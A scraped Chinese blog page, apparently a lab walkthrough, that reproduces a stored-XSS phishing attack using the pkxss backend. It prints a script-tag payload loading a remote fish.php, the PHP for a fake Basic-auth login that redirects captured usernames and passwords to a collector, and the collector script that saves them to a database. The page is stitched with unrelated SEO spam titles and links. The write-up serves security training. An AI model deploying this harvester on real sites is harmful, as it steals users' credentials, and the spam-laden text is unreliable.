当前位置: 首页 > news >正文

社区类网站建设的例子网络空间安全论文

社区类网站建设的例子,网络空间安全论文,企业展厅建筑设计,新白鹿网络营销方式一、复现过程 1、payload <script src"http://127.0.0.1/pkxss/xfish/fish.php"></script> 将这段代码插入到含有储存xss的网页上&#xff0c;如下留言板 2、此时恶意代码已经存入数据库&#xff0c;并存在网页中&#xff0c;当另一个用户打开这个网页…

一、复现过程

1、payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

将这段代码插入到含有储存xss的网页上,如下留言板

2、此时恶意代码已经存入数据库,并存在网页中,当另一个用户打开这个网页时,就会触发xss恶意代码,被跳转的另一个页面,并弹出登入框

3、这个时候如果输入账号密码,就会被恶意构造的后台窃取储存

二、分析流程

1、fish.php:文件源码分析,这是恶意构造的页面,即恶意插入xss代码中的url:127.0.0.1/pkxss/xfish/fish.php

即复现步骤2的恶意构造登入页面的源码

这是一个basic认证,你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的infoheader('Content-type:text/html;charset=utf-8');header("WWW-Authenticate: Basic realm='认证'");header('HTTP/1.0 401 Unauthorized');echo 'Authorization Required.';exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IPheader("Location: http://127.0.0.1/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");
}?>

2、xfish.php:他会获取到传入过来的账号密,并将这些存入数据库

<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();if(!empty($_GET['username']) && !empty($_GET['password'])){$username=$_GET['username'];$password=$_GET['password'];$referer="";$referer.=$_SERVER['HTTP_REFERER'];$time=date('Y-m-d g:i:s');$query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";$result=mysqli_query($link, $query);
}?>

总结:

1、在含有xss漏洞页面,插入一个一个恶意script代码,代码会触发跳转页到恶意页面

http://www.yayakq.cn/news/358322/

相关文章:

  • 建设网站收费明细南京江北建设有限公司
  • 安溪城乡建设局网站企业网站建设服务商
  • 网站外链建设方法京东商城网站怎么做的自适应
  • 网站开发一个支付功能要好多钱高端食品品牌排行榜前十名
  • 彩票网站开发演示网站地图怎么做、
  • 广州做创客教室的厂家网站网站建设 博贤科技
  • 一级A做爰片安全网站阿里云免费域名注册
  • 写作网站保底和全勤的区别百度联盟广告点击技巧
  • 店面设计费入什么科目广东seo推广贵不贵
  • 江西建设职业技术学院招生信息网站网站正在建设中 html源码
  • 如何自己做网站建设创建网站得花多少钱
  • 网站代理备案网站开发设计总结及心得体会
  • 魏县网络营销推广方法丽水百度seo
  • 诸暨网站制作消息提示怎么做网站
  • 合肥做拼拼团网站的公司wordpress 一键生成
  • 东丽网站建设公司wordpress academy
  • 网站建设有微信的关系做摄影网站的目的是什么
  • 怎么做网站收录装修设计网站哪个平台最好
  • 江苏公司网站建设公司网站seo诊断书
  • 自己网站上做淘宝搜索引擎无锡网站建设 君通科技
  • 厦工品牌网站设计线上广告平台
  • 建设银行网站怎么登陆不了了维护公司
  • 国外做外贸哪个网站好些一个域名可以建几个网站
  • 网站质量度济南企业网站制作
  • 惠州网站建设制作价格c++语言做网站
  • 天津网站快速排名提升泉州制作网站设计
  • 建一个小型的购物网站服务器一年要多少钱网站查询域名访问
  • 郴州建设网站哪家好装修黑榜第一名
  • 网站主机要怎么做如何制作学校网站
  • 潍坊滨海开发区建设局网站郑州新闻最新消息新闻